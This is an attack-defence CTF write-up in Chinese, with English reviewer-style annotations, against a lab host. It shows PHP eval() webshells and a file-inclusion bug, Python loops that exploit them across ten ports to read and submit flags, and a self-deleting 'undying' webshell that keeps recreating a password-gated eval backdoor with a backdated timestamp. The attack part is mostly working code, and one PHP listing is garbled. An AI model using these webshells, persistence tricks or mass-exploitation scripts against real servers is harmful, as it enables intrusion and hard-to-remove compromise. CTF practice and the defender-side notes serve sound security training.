题目环境:
靶机IP: 192.168.2.146
SSH端口: 2201-2210
Web端口: 8801-8810
flag提交地址: 192.168.2.146:8080
flag提交api: 192.168.2.146:8080/flag_file.php?token=队伍token&flag=获取到的flag
D盾漏洞
漏洞1——.a.php
漏洞详情:
<?php @eval($_REQUEST['c']);
?>
可以看到是一句话木马。
漏洞利用:
list目录:192.168.2.146:8801/.a.php?c=system(ls);
cat flag:192.168.2.146:8801/.a.php?c=system(“cat /flag”);
批量获取flag + 提交flag 脚本:
# 192.168.2.146:8801/.a.php?c=system("cat /flag");
# Harvest-and-submit loop for the .a.php one-liner shell (@eval($_REQUEST['c'])).
# Seen from the server side, every request this sends is a GET to /.a.php whose
# `c` query parameter carries PHP source code — that request shape is what a
# defender would alert on in the access log.
import requests
url1 = "http://192.168.2.146:"
url2 = '/.a.php'
# Web ports are 8801-8810 (environment header above), hence 8800 + i for i in 1..10.
for i in range(1 , 11):
    payload = { "c" : 'system("cat /flag");'}
    url = url1 + str(8800 + i) + url2
    try:
        # No timeout is passed, so a host that accepts the connection but never
        # answers holds up the whole loop.
        res = requests.get(url, params = payload)
    except:
        # Bare except: every failure (connection refused, KeyboardInterrupt, ...)
        # is swallowed and the host is skipped without a log line.
        continue
    else:
        print(res.text)
        # The raw response body is submitted unfiltered; anything the shell printed
        # besides the flag goes to the scoreboard as-is. submit_flag (the
        # scoreboard's reply) is never inspected.
        flag_payload = { "token" : "team1" , "flag" : res.text}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php" , params = flag_payload)
漏洞2——a.php
漏洞详情:
<?php @eval($_REQUEST['c']);
var_dump($_SERVER);
?>
漏洞利用:
和上一个差不多,但是比上一个 .a.php 多了 var_dump(),因此在获得 flag 的时候需要做正则匹配(也可以截取字符串= =)。
批量获取flag并提交脚本:
# 192.168.2.146:8801/a.php?c=system("cat /flag");
# Same harvest-and-submit loop as for .a.php, against a.php (which additionally
# calls var_dump($_SERVER) after the eval()). The request shape is unchanged:
# a GET to /a.php with PHP source in the `c` query parameter.
import requests
url1 = "http://192.168.2.146:"
url2 = '/a.php'
# Web ports 8801-8810 -> 8800 + i for i in 1..10.
for i in range(1 , 11):
    payload = { "c" : 'system("cat /flag");'}
    url = url1 + str(8800 + i) + url2
    try:
        # No timeout is given; an unresponsive host blocks the loop.
        res = requests.get(url, params = payload)
    except:
        # Bare except swallows every error, including KeyboardInterrupt.
        continue
    else:
        # a.php runs eval() before var_dump($_SERVER), so the system() output sits
        # at the start of the body; the first 32 characters are taken as the flag
        # (assumes a fixed 32-character flag — not verified here).
        flag = res.text[0:32]
        print(flag)
        # The scoreboard's reply (submit_flag) is never checked.
        flag_payload = {"token": "team1", "flag": flag}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
漏洞3——about.php
漏洞详情:
<?php
$file=$_GET['file'];
include $file;
?>
很显然是一个文件包含漏洞:
脚本如下:
# http://192.168.2.146:8801/about.php?file=/flag
# Harvest-and-submit loop for the about.php file-inclusion bug
# (`include $_GET['file']`). Server side this is a GET to /about.php with an
# absolute filesystem path in the `file` parameter — a clear indicator in logs.
import requests
url1 = "http://192.168.2.146:"
url2 = '/about.php'
# Web ports 8801-8810 -> 8800 + i for i in 1..10.
for i in range(1 , 11):
    payload = { "file" : '/flag'}
    url = url1 + str(8800 + i) + url2
    try:
        # No timeout is given; an unresponsive host blocks the loop.
        res = requests.get(url, params = payload)
    except:
        # Bare except swallows every error, including KeyboardInterrupt.
        continue
    else:
        # PHP's include emits a file's text verbatim when it contains no PHP tags,
        # so the body is expected to start with the flag; the first 32 characters
        # are taken (assumes a fixed 32-character flag — not verified here).
        flag = res.text[0:32]
        print(flag)
        # The scoreboard's reply (submit_flag) is never checked.
        flag_payload = {"token": "team1", "flag": flag}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
漏洞4——config.php
还是一句话木马
脚本如下:
# http://192.168.2.146:8801/config.php?c=system("cat /flag");
# Harvest-and-submit loop for config.php. The page describes it only as another
# one-liner shell (its source is not shown); the request shape used here is the
# same as for .a.php: a GET with PHP source in the `c` query parameter.
import requests
url1 = "http://192.168.2.146:"
url2 = '/config.php'
# Web ports 8801-8810 -> 8800 + i for i in 1..10.
for i in range(1 , 11):
    payload = { "c" : 'system("cat /flag");'}
    url = url1 + str(8800 + i) + url2
    try:
        # No timeout is given; an unresponsive host blocks the loop.
        res = requests.get(url, params = payload)
    except:
        # Bare except swallows every error, including KeyboardInterrupt.
        continue
    else:
        # First 32 characters of the body are taken as the flag
        # (assumes a fixed 32-character flag — not verified here).
        flag = res.text[0:32]
        print(flag)
        # The scoreboard's reply (submit_flag) is never checked.
        flag_payload = {"token": "team1", "flag": flag}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
利用一句话木马批量上传不死马
-
PHP版本不死马:
while (1){
file_put_contents(
f
i
l
e
,
file,
file,code);
system(‘touch -m -d “2018-12-01 09:10:12” .2.php’);
usleep(5000);
}
?>
```
-
在 hackbar 中上传不死马(假设 c 为一句话木马的密码,其中 stripslashes()
为反转义函数c=file_put_contents("bsm.php",stripslashes("<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\$file = \'2.php\';\$code = \'<?php if(md5(\$_GET[\"pass\"])==\"1ac3544114c9c5e2853a183138093e5e\"){@eval(\$_POST[\"coin\"]);} ?>\';while (1){ file_put_contents(\$file,\$code); system(\'touch -m -d \"2018-12-01 09:10:12\" .2.php\'); usleep(5000);} ?>"));
-
由于批量上传不死马,需要用到Python,因此对上方的PHP不死马需要进行二次转义
file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));
-
最终的python脚本
# NOTE(review): this script was pasted onto a single line. As written, the first
# `#` (after `url2 = "/.a.php"`) turns the rest of the line into a comment, so it
# is not runnable as-is; it is kept untouched here.
# What the embedded code describes: via the .a.php shell it writes bsm.php, which
# deletes itself (unlink(__FILE__)) and then loops forever re-creating 2.php
# (a password-gated @eval($_POST["coin"]) shell) and running
# `touch -m -d "2018-12-01 09:10:12" .2.php`, i.e. backdating a modification time.
# Defender-side artefacts this leaves: a long-running PHP worker per upload
# (ignore_user_abort(true) + set_time_limit(0)), a 2.php that reappears within
# milliseconds of being deleted (usleep(5000)), and a file whose mtime no longer
# reflects when it was written — so mtime-based triage is unreliable; process-list
# and file-creation monitoring are the more dependable signals.
import time import requests url1 = "http://192.168.2.146:" url2 = "/.a.php" #这里的.a.php里有一句话木马 @eval($_REQUEST['c']); for i in range(1,11): print("*****************************") url = url1 + str(8800 + i) + url2 hack = "file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));" data = { "c" : hack } try: upload_res = requests.post(url , data=data) except: continue else: print("端口号为" + str(8800 + i) + "的机器不死马上传成功" ) requests_url = url1 + str(8800 + i) + "/bsm.php" # 访问不死马 try: requests_res = requests.get(requests_url , timeout = 5) except: time.sleep(6) #程序停止6秒用于生成不死马2.php print("-------开始访问不死马获取flag:") get_flag_url = url1 + str(8800+i) + "/2.php?pass=7coin@1202" get_flag_data = { "coin" : "system(\"cat /flag\");" } get_flag_res = requests.post(get_flag_url , data=get_flag_data) print("端口号为"+str(8800+i)+"的机器flag为:"+get_flag_res.text[0:32]) flag_payload = {"token": "team1", "flag": get_flag_res.text[0:32]} submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload) print("flag提交成功!!!!!!!!!")